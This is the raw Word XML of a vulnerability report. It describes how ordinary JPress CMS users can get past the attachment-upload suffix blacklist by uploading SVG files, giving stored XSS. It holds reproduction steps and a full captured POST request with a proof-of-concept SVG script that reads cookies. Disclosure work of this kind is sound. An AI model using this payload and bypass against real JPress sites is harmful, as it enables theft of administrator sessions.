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29AE7"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JPRESS file upload leads to code execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF7C95B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1. Vulnerability Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5474E5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Guizhou Xiaoma Technology Co., Ltd. is a technology company focusing on Internet product development and technological innovation. The company is committed to providing customers with high-quality technical solutions, software development and product design services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D7B0C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Its jpress cms has a file upload vulnerability in /commons/attachment/upload. Attackers can bypass the suffix detection and use ordinary users to upload malicious svg files to achieve code execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0207321D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E33109A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2. Impact of the vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5405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Ordinary users can upload files to execute malicious svg code and steal administrator cookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AD3F65">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="246162DC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3. Vulnerability location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C4CC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\jpress-web\src\main\java\io\jpress\web\commons\controller\AttachmentController.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E97247">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A206CC6">
      <w:pPr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4. Code analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B56D3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Under the /commons/attachment/ route, user cookies and file upload detection are set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B950B4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2715" cy="5347970"/>
            <wp:effectExtent l="0" t="0" r="698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534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77A1DE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman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t>AttachmentUtils.isUnSafe(file) sets the suffix blacklist and bypasses it by uploading a file with svg suffix.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166E256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6685" cy="4523740"/>
            <wp:effectExtent l="0" t="0" r="571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3F8660">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F64EF50">
      <w:pPr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5. Vulnerability Reproduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA691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 the corresponding source code on gitee for construction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E1B5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Source code link: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"https://gitee.com/JPressProjects/jpress"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https://gitee.com/JPressProjects/jpress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4E565183">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E3A1A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Register as a normal user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54834EA4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="u7f3f2f90"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5232400" cy="27514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A918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Log in to the admin background, no permission</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FC3721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="uedf229ff"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5231765" cy="248475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E930574"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User login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4A7E6D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="udb80c8b6"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5186680" cy="257238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601FC88"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Upload svg in the avatar settings and use burpsuite to capture the package.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763A9FA4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="u1496359a"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5171440" cy="2849245"/>
            <wp:effectExtent l="0" t="0" r="1016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7783BDA6"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Get upload address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DC1A90">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="uaa3c2a77"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5276215" cy="2795905"/>
            <wp:effectExtent l="0" t="0" r="698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412B63C"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Make a visit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E19728">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="gi1lN"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5245100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D142FC2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="46DE5272">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:pBdr>
          <w:top w:val="single" w:color="000000" w:themeColor="text1" w:sz="4" w:space="1"/>
          <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="4" w:space="4"/>
          <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="4" w:space="1"/>
          <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="GfTZv"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>POST /commons/attachment/upload?csrf_token=86601d0df5ead7bc92cf43e586ab56e5 HTTP/1.1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Host: 192.168.187.129:8080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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0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Accept: */*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Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2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Accept-Encoding: gzip, deflate, br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Referer: http://192.168.187.129:8080/ucenter/avatar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X-Requested-With: XMLHttpRequest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Content-Type: multipart/form-data; boundary=---------------------------14653652473767696624612951018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Content-Length: 2133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Origin: http://192.168.187.129:8080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Connection: close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Cookie: _jpanonym="YTA5ZmUzNWUwMWYzZDk5Mzk1MzA4YjUxMmQ3MTI3MTUjMTczMDI2OTU2MzMyOSMzMTUzNjAwMCNOMkl3TW1JMk1qVmxObVkzTkRFeFl6a3lNVFU0TTJKa016Qm1OamRqTVdRPQ=="; csrf_token=86601d0df5ead7bc92cf43e586ab56e5; Hm_lvt_bfe2407e37bbaa8dc195c5db42daf96a=1730270183; Hm_lpvt_bfe2407e37bbaa8dc195c5db42daf96a=1730270323; HMACCOUNT=90C5742B2D10BDA1; _jpuid="OGZjYmMyN2Y1YmZhMWNkMzZhNmM4NzkwMDA2YTc1MjYjMTczMDI3MDM0MTUwOSMxNzI4MDAjTWc9PQ=="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Content-Disposition: form-data; name="path"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Content-Disposition: form-data; name="x"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Content-Disposition: form-data; name="y"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Content-Disposition: form-data; name="w"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Content-Disposition: form-data; name="h"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Content-Disposition: form-data; name="uid"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2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Content-Disposition: form-data; name="csrf_token"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86601d0df5ead7bc92cf43e586ab56e5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Content-Disposition: form-data; name="files[]"; filename="html.svg"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Content-Type: image/png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&lt;!DOCTYPE html&gt;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&lt;html&gt;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&lt;head&gt;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&lt;title&gt;Example of stored XSS with SVG file &lt;/title&gt;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&lt;/head&gt;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&lt;body&gt;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&lt;script type="text/javascript"&gt;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// Function to set a cookie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function setCookie(cookieName, cookieValue, expirationDays)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var date = new Date();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date.setTime(date.getTime() + (expirationDays * 24 * 60 * 60 * 1000));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var expires = 'expires=' + date.toUTCString();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document.cookie = cookieName + '=' + encodeURIComponent(cookieValue) + '; ' + expires + '; path=/';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// create a cookie for this page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setCookie('username', 'JohnDoe', 7); // Sets a cookie named 'username' with value 'JohnDoe' that expires in 7 days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&lt;/script&gt;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&lt;svg width="100" height="100" xmlns="http://www.w3.org/2000/svg"&gt;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&lt;circle cx="50" cy="50" r="40" stroke="black" stroke-width="3" fill="red" /&gt;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&lt;script type="text/javascript"&gt;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&lt;![CDATA[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// JavaScript code embedded in the SVG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function getUserCookies() {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// Read all cookies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var allCookies = document.cookie;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  alert("Cookies found:" + allCookies)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}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// call the function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  getUserCookies();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  ]]&gt;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&lt;/script&gt;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 xml:space="preserve">  &lt;/svg&gt;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&lt;/body&gt;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t>-----------------------------14653652473767696624612951018--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/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3M2M5MmFkNWY5MTYwNDhjOWY5Mzg0Yjc3M2RmNDgifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="3FAC4BC0"/>
    <w:rsid w:val="3FA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2024-11-16T05:58:00Z</dcterms:created>
  <dc:creator>巴扎黑和吾皇</dc:creator>
  <cp:lastModifiedBy>巴扎黑和吾皇</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-16T06:16:39Z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D007A828FFC64C9BADAE9A37FA12E38F_11</vt:lpwstr>
  </property>
</Properties>
</file>